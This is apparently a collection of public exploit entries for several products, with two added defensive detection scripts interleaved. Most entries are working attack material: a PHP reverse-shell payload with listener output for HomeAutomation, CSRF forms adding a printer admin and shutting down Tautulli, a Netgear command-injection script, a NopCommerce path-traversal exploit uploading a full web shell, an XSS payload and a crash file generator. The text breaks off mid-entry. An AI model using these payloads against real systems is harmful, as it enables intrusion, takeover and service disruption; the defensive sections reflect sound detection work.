# Exploit: HomeAutomation 3.3.2 - Remote Code Execution
# Date: 2019-12-30
# Author: LiquidWorm
# Vendor: Tom Rosenback and Daniel Malmgren
# Product web page: http://karpero.mine.nu/ha/
# Affected version: 3.3.2
# Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
# Advisory ID: ZSL-2019-5560
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5560.php
HomeAutomation v3.3.2 CSRF Remote Command Execution (PHP Reverse Shell) PoC
Vendor: Tom Rosenback and Daniel Malmgren
Product web page: http://karpero.mine.nu/ha/
Affected version: 3.3.2
Summary: HomeAutomation is an open-source web interface and scheduling solution.
It was initially made for use with the Telldus TellStick, but is now based on a
plugin system and except for Tellstick it also comes with support for Crestron,
OWFS and Z-Wave (using OpenZWave). It controls your devices (switches, dimmers,
etc.) based on an advanced scheduling system, taking into account things like
measurements from various sensors. With the houseplan view you can get a simple
overview of the status of your devices at their location in your house.
Desc: The application suffers from an authenticated OS command execution vulnerability
in the Custom Command v0.1 plugin. Combined with the CSRF vulnerability, this can be
exploited to execute arbitrary shell commands as the web user via the 'set_command_on'
and 'set_command_off' POST parameters; the saved setting is passed unsanitized to PHP's
exec() in '/system/systemplugins/customcommand/customcommand.plugin.php'.
===============================================================================
/system/systemplugins/customcommand/customcommand.plugin.php (lines 77-100):
-------------------------------------------------------------
function toggleDevices($devicesToToggle, $statuses) {
    $output = array();
    $command = "";

    foreach($devicesToToggle as $device)
    {
        $status = $statuses[$device["id"]];
        if($status == 0) {
            $command = $this->getSettings("command_off");
        } else {
            $command = $this->getSettings("command_on");
        }

        if(!empty($command)) {
            $command = replaceCustomStrings($command, $device, $statuses[$device["id"]]);

            exec($command, $output);

            SaveLog("Command: ".$command."\nOutput:\n".parseExecOutputToString($output));
        }
    }

    return "";
}
===============================================================================
Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
Apache/2.4.29 (Ubuntu)
PHP/7.4.0RC4
PHP/7.3.11
PHP 7.2.24-0ubuntu0.18.04.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2019-5560
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5560.php
06.11.2019
--
POST /homeautomation_v3_3_2/?page=conf-systemplugins HTTP/1.1
plugin=customcommand&action=savesettings&set_command_on=php+-r+%27%24sock%3Dfsockopen%28%22127.0.0.1%22%2C4444%29%3Bexec%28%22%2Fbin%2Fsh+-i+%3C%263+%3E%263+2%3E%263%22%29%3B%27&set_command_off=&savesettings=Save
-
lqwrm@metalgear:/$ nc -lvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from localhost 40724 received!
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ pwd
/var/www/html/homeautomation_v3_3_2
$ exit
lqwrm@metalgear:/$
# Exploit Title: Xerox AltaLink C8035 Printer - Cross-Site Request Forgery (Add Admin)
# Date: 2018-12-17
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.xerox.com/
# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/altalink-c8000-series
# Software : Xerox Printer
# Product Version: AltaLink C8035
# Vulnerability Type : Cross-Site Request Forgery (Add Admin)
# Vulnerability : Cross-Site Request Forgery
# CVE : N/A
# Description :
# The CSRF vulnerability was discovered in the AltaLink C8035 printer model of Xerox printer hardware.
# A request to add users is made in the Device User Database form field. This request is captured by
# the proxy. And a CSRF PoC HTML file is prepared. Xerox AltaLink C8035 printers allow CSRF. A request
# to add users is made in the Device User Database form field to the xerox.set URI.
# (The frmUserName value must have a unique name.)
# HTTP POST Request :
POST /dummypost/xerox.set HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 707
Origin: https://XXX.XXX.XXX.XXX
Connection: close
Referer: https://XXX.XXX.XXX.XXX/properties/authentication/UserEdit.php?nav_point_key=10
Cookie: PHPSESSID=fd93756986787a2e338da8eae1ff2ef4; statusSelected=n1; statusNumNodes=8; CERT_INFO=8738a6169beda5f6cc754db4fc40ad63; propSelected=n59; propHierarchy=00000001000000000000000010010; LastPage=/properties/authentication/UserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp
Upgrade-Insecure-Requests: 1
NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3F&isRoles=True&isPassword=True&isCreate=True&rolesStr=6%2C1%2C2&limited=0&oid=0&minLength=1&maxLength=63&isFriendlyNameDisallowed=TRUE&isUserNameDisallowed=TRUE&isNumberRequired=&CSRFToken=34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a&currentPage=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10&_fun_function=HTTP_Set_User_Edit_fn&frmFriendlyName=Ismail+Tasdelen&frmUserName=ismailtasdelen&frmNewPassword=Test1234%21&frmRetypePassword=Test1234%21&frmOldPassword=undefined&SaveURL=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10
# CSRF PoC HTML :
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://XXX.XXX.XXX.XXX/dummypost/xerox.set" method="POST">
<input type="hidden" name="NextPage" value="/properties/authentication/UserManager.php?" />
<input type="hidden" name="isRoles" value="True" />
<input type="hidden" name="isPassword" value="True" />
<input type="hidden" name="isCreate" value="True" />
<input type="hidden" name="rolesStr" value="6,1,2" />
<input type="hidden" name="limited" value="0" />
<input type="hidden" name="oid" value="0" />
<input type="hidden" name="minLength" value="1" />
<input type="hidden" name="maxLength" value="63" />
<input type="hidden" name="isFriendlyNameDisallowed" value="TRUE" />
<input type="hidden" name="isUserNameDisallowed" value="TRUE" />
<input type="hidden" name="isNumberRequired" value="" />
<input type="hidden" name="CSRFToken" value="34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a" />
<input type="hidden" name="currentPage" value="/properties/authentication/UserEdit.php?nav_point_key=10" />
<input type="hidden" name="_fun_function" value="HTTP_Set_User_Edit_fn" />
<input type="hidden" name="frmFriendlyName" value="Ismail Tasdelen" />
<input type="hidden" name="frmUserName" value="ismailtasdelen" />
<input type="hidden" name="frmNewPassword" value="Test1234!" />
<input type="hidden" name="frmRetypePassword" value="Test1234!" />
<input type="hidden" name="frmOldPassword" value="undefined" />
<input type="hidden" name="SaveURL" value="/properties/authentication/UserEdit.php?nav_point_key=10" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: Tautulli 2.1.9 - Cross-Site Request Forgery (ShutDown)
# Date: 2018-12-17
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://tautulli.com/
# Software : https://github.com/Tautulli/Tautulli
# Product Version: v2.1.9
# Platform: Windows 10 (10.0.18362)
# Python Version: 2.7.11 (v2.7.11:6d1b6a68f775, Dec 5 2015, 20:40:30) [MSC v.1500 64 bit (AMD64)]
# Vulnerability Type : Cross-Site Request Forgery (ShutDown)
# Vulnerability : Cross-Site Request Forgery
# CVE : N/A
# Description :
# In Tautulli v2.1.9 it has been discovered that, when the application is deployed
# without a user login, it can be reached anonymously and the remote media server
# can be shut down by a forged request.
# PoC Python Script :
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
icon = """
_____ __ _ _ _____ _ _ _ _ _ _ _ ___ __ ___
|_ _/ \| || |_ _| || | | | | | | | \ / (_ | / |/ _ \
| || /\ | \/ | | | | \/ | |_| |_| | `\ V /'/ /__`7 |\__ /
|_||_||_|\__/ |_| \__/|___|___|_| \_/ |___\/ |_\//_/
Unauthenticated Remote Code Execution
by Ismail Tasdelen
"""
print(icon)
host = raw_input("[+] HOST: ")  # raw_input: plain string under Python 2 (input() would eval it)
port = raw_input("[+] PORT: ")
# The restart and update_check endpoints can be requested the same way.
response = requests.get("http://" + host + ":" + port + "/shutdown")
if response.status_code == 200:
    print('[✓] Success!')
else:
    print('[✗] Unsuccessful!')
# HTTP GET Request :
GET /shutdown HTTP/1.1
Host: XXX.XXX.XXX.XXX:8181
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://XXX.XXX.XXX.XXX:8181/home
Upgrade-Insecure-Requests: 1
# CSRF PoC HTML :
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://XXX.XXX.XXX.XXX:8181/shutdown">
<input type="submit" value="Submit request" />
</form>
</body>
</html>
# Exploit Title: Netgear R6400 - Remote Code Execution
# Date: 2019-12-14
# Exploit Author: Kevin Randall
# CVE: CVE-2016-6277
# Vendor Homepage: https://www.netgear.com/
# Category: Hardware
# Version: V1.0.7.2_1.1.93
# PoC
#!/usr/bin/python
import urllib2

IP_ADDR = "192.168.1.1"
PROTOCOL = "http://"
DIRECTORY = "/cgi-bin/;"
CMD = "date"
FULL_URL = PROTOCOL + IP_ADDR + DIRECTORY + CMD

req = urllib2.Request(url=FULL_URL)
response = urllib2.urlopen(req)
commandoutput = response.read()

# Keep only what follows the last '}' of the response body
spl_word = "}"
result = commandoutput.rpartition(spl_word)[2]
print result
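As an added detection example (not part of any advisory above, and not the authors' code), the following Python scans constructed Apache/nginx combined-format access-log lines for two of the request shapes documented on this page: the Netgear CVE-2016-6277 `/cgi-bin/;command` path injection, including percent-encoded variants, and POSTs to the HomeAutomation `conf-systemplugins` settings page whose Referer names a foreign origin, which is the cross-site request that delivers the Custom Command RCE. The log lines, client addresses, the `attacker.example` origin and the `SITE_HOSTS` set are all constructed assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample log lines (combined log format); not taken from the advisories.
SAMPLE_LOG = """\
192.168.1.50 - - [14/Dec/2019:10:02:11 +0000] "GET /cgi-bin/;date HTTP/1.1" 200 512 "-" "python-urllib/2.7"
192.168.1.51 - - [14/Dec/2019:10:03:40 +0000] "GET /cgi-bin/%3Buname%20-a HTTP/1.1" 200 640 "-" "curl/7.64.0"
192.168.1.52 - - [14/Dec/2019:10:04:01 +0000] "GET /cgi-bin/status.cgi?x=1 HTTP/1.1" 200 300 "-" "Mozilla/5.0"
192.168.1.53 - - [14/Dec/2019:10:05:22 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.168.2.20 - - [06/Nov/2019:12:00:00 +0000] "POST /homeautomation_v3_3_2/?page=conf-systemplugins HTTP/1.1" 302 0 "http://attacker.example/csrf.html" "Mozilla/5.0"
192.168.2.21 - - [06/Nov/2019:12:01:10 +0000] "POST /homeautomation_v3_3_2/?page=conf-systemplugins HTTP/1.1" 302 0 "http://192.168.2.113/homeautomation_v3_3_2/?page=conf-systemplugins" "Mozilla/5.0"
"""

# Hosts the application is legitimately served from (assumption for this example).
SITE_HOSTS = {"192.168.2.113", "localhost"}

# ip ident user [timestamp] "METHOD PATH PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def fully_decode(path):
    """Percent-decode until stable, so %3B and double-encoded %253B both become ';'."""
    while True:
        decoded = unquote(path)
        if decoded == path:
            return decoded
        path = decoded


def is_cgi_bin_injection(path):
    """CVE-2016-6277 shape: a ';' straight after /cgi-bin/ hands the rest of the
    path to the firmware's shell. Only the path part is examined, not the query."""
    decoded = fully_decode(path.split("?", 1)[0])
    return re.match(r"^/cgi-bin/\s*;", decoded) is not None


def is_cross_site_post(rec, site_hosts):
    """A state-changing POST whose Referer names a host we do not serve is the
    footprint of a CSRF page submitting a form into the application."""
    if rec["method"] != "POST" or rec["referer"] in ("", "-"):
        return False
    return urlsplit(rec["referer"]).hostname not in site_hosts


def scan(log_text, site_hosts=SITE_HOSTS):
    """Return (client_ip, finding, request_path) for every suspicious line."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if is_cgi_bin_injection(rec["path"]):
            findings.append((rec["ip"], "cgi-bin command injection", rec["path"]))
        if is_cross_site_post(rec, site_hosts):
            findings.append((rec["ip"], "cross-site POST (possible CSRF)", rec["path"]))
    return findings


if __name__ == "__main__":
    for ip, what, path in scan(SAMPLE_LOG):
        print(f"{ip:15} {what:32} {path}")
```

The Referer heuristic only catches forged requests from browsers that still send a Referer; pair it with server-side token validation and SameSite cookies rather than relying on it alone.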
# Exploit Title: XnView 2.49.1 - 'Research' Denial of Service (PoC)
# Exploit Author : ZwX
# Exploit Date: 2019-12-17
# Vendor Homepage : http://www.xnview.com
# Link Software : https://www.xnview.com/fr/xnview/#downloads
# Tested on OS: Windows 7
'''
Proof of Concept (PoC):
=======================
1.Download and install XnView
2.Open the XnView for Windows tools
3.Run the python operating script that will create a file (poc.txt)
4.Run the software " Tools -> Research -> A search window opens "
5.Copy and paste the characters in the file (poc.txt)
6.Paste the characters in the field 'File Name' and 'In' click on 'Research'
7.XnView for Windows Crashed
'''
#!/usr/bin/python
DoS=("\x2E\x73\x6E\x64\x00\x00\x01\x18\x00\x00\x42\xDC\x00\x00\x00\x01"
"\x00\x00\x1F\x40\x00\x00\x00\x00\x69\x61\x70\x65\x74\x75\x73\x2E"
"\x61\x75\x00\x20\x22\x69\x61\x70\x65\x74\x75\x73\x2E\x61\x75\x22"
"\x40\x4f\x73\x61\x6e\x64\x61\x4d\x61\x6c\x69\x74\x68\x00\x00\x00"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x74\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x31\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41")
poc = DoS
file = open("poc.txt", "w")
file.write(poc)
file.close()
print "POC Created by ZwX"
# Vulnerability Title: NopCommerce 4.2.0 - Privilege Escalation
# Author: Alessandro Magnosi (d3adc0de)
# Date: 2019-07-07
# Vendor Homepage: https://www.nopcommerce.com/
# Software Link : https://www.nopcommerce.com/
# Tested Version: 4.2.0
# Vulnerability Type: Privilege Escalation
# Tested on OS: Windows 10, CentOS, Docker
# Exploit designed for: NopCommerce 4.2.0 on IIS
import requests
import argparse
from bs4 import BeautifulSoup
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import warnings

warnings.filterwarnings("ignore", category=UserWarning, module='bs4')


def proxy(flag):
    return {"http" : "http://127.0.0.1:9090", "https" : "http://127.0.0.1:9090"} if flag else None


def geturl(baseurl, type):
    if type == "login":
        return baseurl + "/login"
    elif type == "mv":
        return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=RENAMEDIR&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce%2fViews%2fCommon%2f&n=Common2"
    elif type == "mkdir":
        return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=CREATEDIR&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce%2fViews%2f&n=Common"
    elif type == "put":
        return baseurl + "/Admin/RoxyFileman/ProcessRequest?a=UPLOAD"
    elif type == "contactus":
        return baseurl + "/contactus"
    else:
        return ""


def login(email, password, url, proxy):
    res = requests.get(geturl(url, "login"), proxies=proxy, verify=False, allow_redirects=False)
    cookie = res.cookies.get_dict()
    soup = BeautifulSoup(res.text, features="html.parser")
    token = soup.find("input", {"name":"__RequestVerificationToken"})["value"]
    res = requests.post(geturl(url, "login"), cookies=cookie, data={"Email":email, "Password":password, "__RequestVerificationToken":token, "RememberMe":"false"}, proxies=proxy, verify=False, allow_redirects=False)
    cookies = res.cookies.get_dict()
    return { **cookies, **cookie }


def shellupload(email, password, url, proxy):
    print("[+] Trying uploading shell from")
    cookies = login(email, password, url, proxy)
    # Rename Common Directory
    requests.get(geturl(url, "mv"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
    # Create Common Directory
    requests.get(geturl(url, "mkdir"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
    # Upload File into Common
    requests.post(geturl(url, "put"), headers={"Content-Type" : "multipart/form-data; boundary=---------------------------3125261928760" ,"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, data="-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nupload\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"method\"\r\n\r\najax\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"d\"\r\n\r\n/images/uploaded/../../../../../../../../../../inetpub/wwwroot/nopcommerce/Views/Common/\r\n-----------------------------3125261928760\r\nContent-Disposition: form-data; name=\"files[]\"; filename=\"ContactUs.cshtml\"\r\nContent-Type: image/png\r\n\r\n@using System\r\n@using System.Diagnostics\r\n\r\n@{ \r\n ViewData[\"Title\"] = \"MVC Sh3ll Windows\";\r\n var result = \"\";\r\n var cmd = Context.Request.Query[\"cmd\"];\r\n if (!String.IsNullOrEmpty(cmd)){\r\n result = Bash(cmd);\r\n }\r\n\r\n if (String.IsNullOrEmpty(result)){\r\n result = \"Invalid command or something didn't work\";\r\n }\r\n\r\n}\r\n\r\n@functions{\r\n public static string Bash (string cmd)\r\n {\r\n var result = \"\";\r\n var escapedArgs = cmd.Replace(\"\\\"\", \"\\\\\\\"\");\r\n var process = new Process()\r\n {\r\n StartInfo = new ProcessStartInfo\r\n {\r\n FileName = \"cmd.exe\",\r\n Arguments = $\"/C \\\"{escapedArgs}\\\"\",\r\n RedirectStandardOutput = true,\r\n UseShellExecute = false,\r\n CreateNoWindow = true,\r\n }\r\n };\r\n\r\n process.Start();\r\n result = process.StandardOutput.ReadToEnd();\r\n process.WaitForExit();\r\n\r\n return result;\r\n }\r\n}\r\n\r\n\r\n\r\n<script\r\n src=\"https://code.jquery.com/jquery-3.2.1.min.js\"\r\n integrity=\"sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4=\"\r\n crossorigin=\"anonymous\"></script>\r\n<script>\r\n$(function() {\r\n var cmdResult = $(\"#cmdResult\");\r\n\r\n\tconsole.log(cmdResult);\r\n\r\n\tif (cmdResult.text() === \"Invalid command or something didn't work\"){\r\n\t console.log(\"should change text\");\r\n cmdResult.css(\"color\", \"red\");\r\n\t}\r\n\t\r\n\tvar term = $(\"#console\");\r\n $(\"#cmd\").focus();\r\n\tterm.scrollTop(term.prop(\"scrollHeight\"));\r\n\t\r\n\t$.urlParam = function(name){\r\n var results = new RegExp('[\\?&]' + name + '=([^&#]*)').exec(window.location.href);\r\n if (results==null){\r\n return null;\r\n }\r\n else{\r\n return decodeURI(results[1]) || 0;\r\n }\r\n }\r\n\r\n\t\r\n\tfunction executeCmd(){\r\n var cmd = encodeURIComponent($(\"#cmd\").val());\r\n\t var currentCmd = $.urlParam('cmd');\r\n\t console.log(\"should replace: \" + currentCmd + \" WITH: \" + cmd);\r\n\r\n\t var currentUrl = location.href;\r\n\r\n\t var paramDelimeter = \"\";\r\n\t if (currentUrl.indexOf(\"?\") < 0){\r\n\t paramDelimeter = \"?\";\r\n\t } else {\r\n\t paramDelimeter = \"&\";\r\n\t }\r\n \r\n\t if (currentUrl.indexOf(\"cmd=\") < 0){\r\n currentUrl = location.href + paramDelimeter + \"cmd=\";\r\n\t }\r\n\t\r\n var newUrl = currentUrl.replace(/cmd=.*/, \"cmd=\"+cmd);\r\n window.location.href = newUrl;\r\n\r\n\t //console.log(newUrl);\r\n\t}\r\n\t\r\n $(\"#submitCommand\").click(function(){\r\n\t executeCmd();\r\n\t})\r\n\r\n\t$(\"#cmd\").keypress(function (e) {\r\n\t if (e.which == 13) {\r\n\t executeCmd();\r\n\t return false;\r\n\t }\r\n\t});\r\n\r\n\t$(\"#cmd\").on(\"change paste keyup\", function(theVal){\r\n\t var cmd = $(\"#cmd\").val();\r\n\t $(\"#cmdInput\").text(cmd);\r\n\t});\r\n});\r\n\r\n</script>\r\n\r\n\r\n<h3>@ViewData[\"Title\"].</h3>\r\n<h4>@ViewData[\"Message\"]</h4>\r\n<h4>Output for:> <span style=\"font-family: monospace; font-weight: normal;\">@cmd</span></h4>\r\n\r\n\r\n<pre id=\"console\" style=\"color: #00ff00;background-color: #141414;max-height: 606px;\">\r\nC#:>@cmd\r\n\t\r\n<span id=\"cmdResult\">@result</span>\r\n\t\r\nC#:><span id=\"cmdInput\"></span>\r\n</pre>\r\n\r\n<br />\r\n\r\n<p>Enter your command below:</p>\r\n<span style=\"display: inline-flex !important;\">\r\n <input id=\"cmd\" class=\"form-control\" type=\"text\" style=\"width: 400px;\" /> \r\n\t<button id=\"submitCommand\" class=\"btn btn-primary\">Send!</button>\r\n</span>\r\n\r\n-----------------------------3125261928760--", proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
    # Test if it is working
    res = requests.get(geturl(url, "contactus"), headers={"User-Agent" : "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0"}, proxies=proxy, cookies=cookies, verify=False, allow_redirects=False)
    soup = BeautifulSoup(res.text, features="html.parser")
    test = soup.find("span", {"id" : "cmdResult"})
    if test is None:
        print("[-] Maybe the target is not vulnerable, or you need to restart the appliance")
    else:
        print("[+] Shell uploaded under contact us page")


def main():
    parser = argparse.ArgumentParser(description='Upload a shell in NopCommerce')
    parser.add_argument(
        '-e', '--email', required=True, type=str, help='Username')
    parser.add_argument(
        '-p', '--password', required=True, type=str, help='Password')
    parser.add_argument(
        '-u', '--url', required=True, type=str, help='Base Url of NopCommerce')
    parser.add_argument(
        '-x', '--proxy', required=False, action="store_true", help='Proxy (for debugging)')
    args = parser.parse_args()
    shellupload(args.email, args.password, args.url, proxy(args.proxy))


if __name__ == '__main__':
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    main()
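As an added defensive example (not part of the exploit above, nor nopCommerce's or RoxyFileman's own code): the `d` parameter of the RENAMEDIR, CREATEDIR and UPLOAD actions is what lets the script above walk from `/images/uploaded/` into `Views/Common/`. The helper below decodes such a parameter, resolves it against an assumed install path of `/inetpub/wwwroot/nopcommerce` (the layout the exploit targets) and rejects anything outside the upload root; the second function applies the same check to constructed request-log lines, so it doubles as a detection for the GET-based steps.

```python
import posixpath
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed deployment layout; it mirrors the paths hard-coded in the exploit
# above, the real install directory is configuration-specific.
WEB_ROOT = "/inetpub/wwwroot/nopcommerce"
UPLOAD_ROOT = posixpath.join(WEB_ROOT, "images", "uploaded")

# RoxyFileman actions that take a target directory in 'd' (from the exploit).
# RENAMEDIR and CREATEDIR carry it in the query string; UPLOAD carries it in
# the multipart body, so an access log alone cannot judge it.
QUERY_DIR_ACTIONS = {"RENAMEDIR", "CREATEDIR"}
BODY_DIR_ACTIONS = {"UPLOAD"}


def normalise_dir_param(d_param):
    """Decode a RoxyFileman 'd' value and resolve it against WEB_ROOT.

    'd' is expressed relative to the site root ('/images/uploaded/...'), so
    it is anchored under WEB_ROOT before normalisation. unquote() is applied
    twice so a double-encoded '%252e%252e' is seen as '..' (a legitimate name
    containing a literal '%' would be decoded too; reject such names upstream),
    and backslashes count as separators because the target runs on IIS.
    """
    decoded = unquote(unquote(d_param)).replace("\\", "/")
    if "\x00" in decoded:
        raise ValueError("NUL byte in directory parameter")
    return posixpath.normpath(posixpath.join(WEB_ROOT, decoded.lstrip("/")))


def check_dir_param(d_param):
    """Return (allowed, resolved_path_or_reason) for one 'd' value.

    Allowed means the resolved directory is UPLOAD_ROOT itself or lies below
    it; the '/' suffix in the prefix test stops '/images/uploaded_x' from
    passing as a child of '/images/uploaded'.
    """
    try:
        resolved = normalise_dir_param(d_param)
    except ValueError as exc:
        return False, str(exc)
    inside = resolved == UPLOAD_ROOT or resolved.startswith(UPLOAD_ROOT + "/")
    return inside, resolved


def is_inside_upload_root(d_param):
    """Convenience wrapper: the server-side accept/reject decision."""
    return check_dir_param(d_param)[0]


def flag_traversal_requests(request_lines):
    """Scan 'METHOD URL' request lines for ProcessRequest calls that escape the upload root.

    Returns a list of (line, finding) tuples. UPLOAD requests are reported for
    body inspection rather than judged, since their 'd' is not in the URL.
    """
    findings = []
    for line in request_lines:
        _method, _, url = line.partition(" ")
        parts = urlsplit(url)
        if not parts.path.lower().endswith("/admin/roxyfileman/processrequest"):
            continue
        query = parse_qs(parts.query, keep_blank_values=True)
        action = query.get("a", [""])[0].upper()
        if action in BODY_DIR_ACTIONS:
            findings.append((line, f"{action}: 'd' is in the multipart body, inspect the request body"))
        elif action in QUERY_DIR_ACTIONS:
            for d_value in query.get("d", []):
                allowed, detail = check_dir_param(d_value)
                if not allowed:
                    findings.append((line, f"{action} escapes upload root -> {detail}"))
    return findings


# Constructed sample request lines (not real traffic). The third line is the
# RENAMEDIR request the exploit above sends; the others are benign or need body inspection.
SAMPLE_REQUESTS = [
    "GET /Admin/RoxyFileman/ProcessRequest?a=DIRLIST&d=%2fimages%2fuploaded",
    "GET /Admin/RoxyFileman/ProcessRequest?a=CREATEDIR&d=%2fimages%2fuploaded&n=2019",
    "GET /Admin/RoxyFileman/ProcessRequest?a=RENAMEDIR&d=%2fimages%2fuploaded%2f..%2F..%2F..%2F..%2F..%2F..%2F..%2Finetpub%2fwwwroot%2fnopcommerce%2fViews%2fCommon%2f&n=Common2",
    "POST /Admin/RoxyFileman/ProcessRequest?a=UPLOAD",
]

if __name__ == "__main__":
    for line, finding in flag_traversal_requests(SAMPLE_REQUESTS):
        print(f"{finding}\n    {line}")
```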
# Exploit Title: Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting
# Google Dork: site:*.*.com "Web File Manager" inurl:?login=
# Shodan Dork: Server: Rumpus
# Date: 2019-12-14
# Exploit Author: Harshit Shukla, Sudeepto Roy
# Vendor Homepage: https://www.maxum.com/
# Tested On: Windows & Mac
# Version: 8.2.9.1
# CVE: CVE-2019-19368
Description:
A reflected XSS was identified on the Login page of RUMPUS FTP Web File Manager.
PoC:
Payload: ?!'><sVg/OnLoAD=alert`1`//
Vulnerable URL:
http://127.0.0.1/Login?!'><sVg/OnLoAD=alert`1`//
Solution:
Update to the latest version released by vendor.
# Exploit Title: AVS Audio Converter 9.1 - 'Exit folder' Buffer Overflow
# Exploit Author : ZwX
# Exploit Date: 2019-12-17
# Vendor Homepage : http://www.avs4you.com/
# Link Software : http://www.avs4you.com/avs-audio-converter.aspx
# Tested on OS: Windows 7
'''
Technical Details & Description:
================================
A local buffer overflow vulnerability has been discovered in the official AVS Audio Converter.
The vulnerability allows local attackers to overwrite registers (for example EIP) and compromise the local software process.
The issue can be exploited by local attackers with system privileges to compromise the affected local computer system.
The vulnerability is classified as a classic buffer overflow issue.
Analyze Registers:
==================
(1e74.1b78): Access violation - code c0000005 (first chance)
